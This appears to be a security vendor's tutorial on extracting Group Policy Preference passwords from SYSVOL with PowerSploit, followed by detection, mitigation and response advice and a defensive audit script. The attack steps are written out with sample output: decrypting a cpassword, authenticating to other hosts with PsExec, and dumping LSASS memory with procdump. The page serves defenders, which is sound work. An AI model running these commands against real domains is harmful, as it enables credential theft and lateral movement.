Plaintext Password Extraction using PowerSploit

Active Directory
Credential Access
Credential Theft

Group Policy is essential in managing an Active Directory environment. In particular, administrators use it to centrally manage the configuration applied to domain-joined servers and workstations; Group Policy Objects define both policies (enforced settings) and preferences (default configurations that a user is allowed to change).

Unfortunately, Group Policy enabled administrators to embed passwords in Group Policy preferences that created local users or mapped network drives — and those passwords were encrypted with a publicly available key. Therefore, an adversary with the ability to read these policies can readily extract and decrypt these passwords.

In 2014, Microsoft released a security update that removes the ability to create new preferences with embedded passwords, but many organizations still have Group Policy preferences that include embedded passwords.

Threat Summary
  • Target: Active Directory
  • ATT&CK® Tactic:
  • ATT&CK Technique:
  • Difficulty: Detection Low; Mitigation Low; Response Low

Attack Tutorial: Plaintext Password Extraction Attack

STEP 1

Discover passwords in Group Policy preferences

Group Policy preferences are stored as XML files in the SYSVOL share on domain controllers. Because SYSVOL is readable by Authenticated Users, any adversary who has gained a foothold in the network can read its contents. An adversary can parse these XML files manually, looking for instances of the cpassword attribute, which holds the encrypted password; adjacent attributes provide other details, such as the username. Alternatively, they can use a tool such as PowerSploit’s Get-GPPPassword cmdlet to automate finding and decrypting these passwords, as shown below.
PS> Import-Module PowerSploit
PS> Get-GPPPassword
 
Changed   : {2020-08-17 11:14:01}
UserNames : {Administrator (built-in)}
NewName   : [BLANK]
Passwords : {WhatAGreatPassword123!}
File      : \\domain.com\SYSVOL\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml
 
PS> 
STEP 2

Enumerate target computers and use the extracted credential

Now that the adversary has the username and password for a local administrator, they can enumerate the computers in Active Directory on which the Group Policy is applied, which provides them with a list of computers to which they can authenticate using this credential.

With this list, the adversary can continue to expand their footprint within the organization. In this example, the adversary connects to another computer and creates a memory dump of the LSASS.exe process to enable further lateral movement or privilege escalation.
PS> [XML] $XML = Get-GPO -Guid 5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB | Get-GPOReport -ReportType Xml
 
PS> $XML.GPO.LinksTo
 
SOMName SOMPath       Enabled NoOverride
------- -------       ------- ----------
Comp    domain.com/Comp true    false
 
 
PS> $DN = Get-ADOrganizationalUnit -filter { Name -eq $XML.GPO.LinksTo.SOMName } | Select -expand DistinguishedName
 
PS> Get-ADComputer -filter "*" -SearchBase $DN
 
 
DistinguishedName : CN=Server1,OU=Comp,DC=domain,DC=com
DNSHostName       :
Enabled           : True
Name              : Server1
ObjectClass       : computer
ObjectGUID        : 4eeec15e-ee84-4195-b5c8-ee4d5d67efbf
SamAccountName    : SERVER1$
SID               : S-1-5-21-5840559-2756745051-1363507867-16924
UserPrincipalName :
 
 
PS> .\PSExec.exe -u Administrator -p WhatAGreatPassword123! \\server1 powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
PS> procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
PS>

Detect, Mitigate and Respond


Detect
Difficulty: Low
Because of the large volume of read operations occurring in normal operations, it is not possible to directly detect an adversary’s access to these files. However, conducting an audit for passwords embedded in Group Policy Preferences is possible using the same techniques an adversary would use. Using the Get-GPPPassword cmdlet against each domain will enumerate embedded passwords (note that this will also reveal the plaintext). Alternatively, the following PowerShell snippet will enumerate embedded passwords without decrypting them:
# Replace this path with the path to SYSVOL to check
$SYSVOL_Path = "\\domain.com\sysvol"
 
Get-ChildItem $SYSVOL_Path -Recurse -File | Select-String -Pattern "cpassword"
 
# Sample Output using \\domain.com\sysvol
\\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01" uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
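The Select-String one-liner above finds the files but leaves the analyst to read the raw XML. As an added defender-side example (written for this page; it is not part of the original article and not a PowerSploit or Microsoft cmdlet), the script below walks the same SYSVOL tree, parses each preference XML file properly, and reports every element carrying a cpassword attribute as a structured record (GPO GUID, preference type, account name, last change time, file path) without decrypting anything. It assumes Windows PowerShell 5.1 or PowerShell 7 and read access to the path given; the function name Find-GppEmbeddedPassword, the temporary demo directory, the GUIDs and the cpassword value in the demo are all constructed placeholders.

```powershell
# Added example, not from the original page. Audits a SYSVOL tree for Group
# Policy preference XML files that carry a cpassword attribute and reports where
# each one lives and which account it belongs to, without decrypting anything.
# Assumes Windows PowerShell 5.1 or PowerShell 7 and read access to the path
# given; the function name and all demo values below are constructed.

function Find-GppEmbeddedPassword {
    [CmdletBinding()]
    param(
        # Root to scan, e.g. \\domain.com\SYSVOL (or a local copy of it)
        [Parameter(Mandatory)] [string] $SysvolPath
    )

    # Preference file types that could carry a cpassword attribute
    $prefFiles = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml',
                 'DataSources.xml', 'Drives.xml', 'Printers.xml'
    # The attribute that names the account differs per preference type
    $accountAttrs = 'userName', 'accountName', 'runAs', 'username'

    Get-ChildItem -Path $SysvolPath -Recurse -File -Include $prefFiles -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            try   { [xml] $doc = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction Stop }
            catch { Write-Warning "Skipping unparsable file $($file.FullName): $_"; return }

            # The GPO GUID is the {...} directory directly under Policies
            $gpoGuid = if ($file.FullName -match '[\\/]Policies[\\/](\{[0-9A-Fa-f-]+\})[\\/]') { $Matches[1] } else { '' }

            # XPath: every element anywhere in the document that has a cpassword attribute
            foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
                $account = ''
                foreach ($attr in $accountAttrs) {
                    if ($node.HasAttribute($attr)) { $account = $node.GetAttribute($attr); break }
                }
                # The enclosing item element (<User>, <NTService>, ...) holds the change timestamp
                $parent  = $node.ParentNode
                $changed = if ($parent -is [System.Xml.XmlElement]) { $parent.GetAttribute('changed') } else { '' }

                [pscustomobject]@{
                    GpoGuid = $gpoGuid
                    Type    = $file.BaseName          # Groups, Services, ScheduledTasks, ...
                    Account = $account
                    Changed = $changed
                    Empty   = [string]::IsNullOrEmpty($node.GetAttribute('cpassword'))
                    File    = $file.FullName
                }
            }
        }
}

# --- Offline demonstration against a constructed SYSVOL layout (no real data) ---
$demoRoot = Join-Path ([IO.Path]::GetTempPath()) ('gpp-audit-' + [guid]::NewGuid())
$gpoDir   = [IO.Path]::Combine([string[]]@($demoRoot, 'domain.com', 'Policies',
            '{11111111-1111-1111-1111-111111111111}', 'Machine', 'Preferences', 'Groups'))
New-Item -ItemType Directory -Path $gpoDir -Force | Out-Null
@'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)"
        image="2" changed="2020-08-17 11:14:01" uid="{22222222-2222-2222-2222-222222222222}">
    <Properties action="U" newName="" fullName="" description="Built-in Local Admin"
                cpassword="CONSTRUCTED_PLACEHOLDER_NOT_A_REAL_VALUE=" changeLogon="0" noChange="0"
                neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
  </User>
</Groups>
'@ | Set-Content -LiteralPath (Join-Path $gpoDir 'Groups.xml') -Encoding UTF8

# Expected: one row, Type Groups, Account "Administrator (built-in)", Empty False
Find-GppEmbeddedPassword -SysvolPath $demoRoot | Format-Table -AutoSize
Remove-Item -LiteralPath $demoRoot -Recurse -Force
```

In production, point -SysvolPath at \\domain.com\SYSVOL from a domain-joined host and run it once per domain; the GpoGuid column maps directly to Get-GPO -Guid for identifying the owning GPO, and rows with Empty = True mark items where the attribute exists but is blank, which carry no password but are still worth cleaning up. Parsing the XML rather than grepping it also catches the non-Groups preference types (services, scheduled tasks, data sources, drives, printers) that the page's Select-String check would list only as matching files.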
Mitigate
Difficulty: Low
Simply put, all embedded passwords in Group Policy preferences should be removed. Additionally:
  • Ensure that all domain controllers are running current operating system versions with the latest patches, since current versions of Windows Server do not permit the embedding of passwords in Group Policy preferences.
  • Replace the use of Group Policy preferences to set the built-in local administrator account’s password with a robust solution like Microsoft’s Local Administrator Password Solution (LAPS).
  • Adopt solutions that replace embedded passwords with authenticated dynamic lookups.
Respond
Difficulty: Low
Should you discover embedded passwords in Group Policy preferences, the following actions can be taken:
  • Remove the embedded password from the Group Policy preference.
  • Reset the password for the account.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.